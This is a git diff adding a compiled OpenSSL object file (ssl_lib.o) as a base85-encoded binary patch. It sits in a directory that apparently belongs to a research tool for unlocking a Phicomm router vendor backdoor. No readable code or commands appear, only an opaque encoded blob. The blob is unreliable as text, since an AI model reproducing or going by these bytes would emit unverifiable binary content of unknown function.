diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..410f2c22b6f5d1532d8c39740ec568953c061ebd
GIT binary patch
literal 46616
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
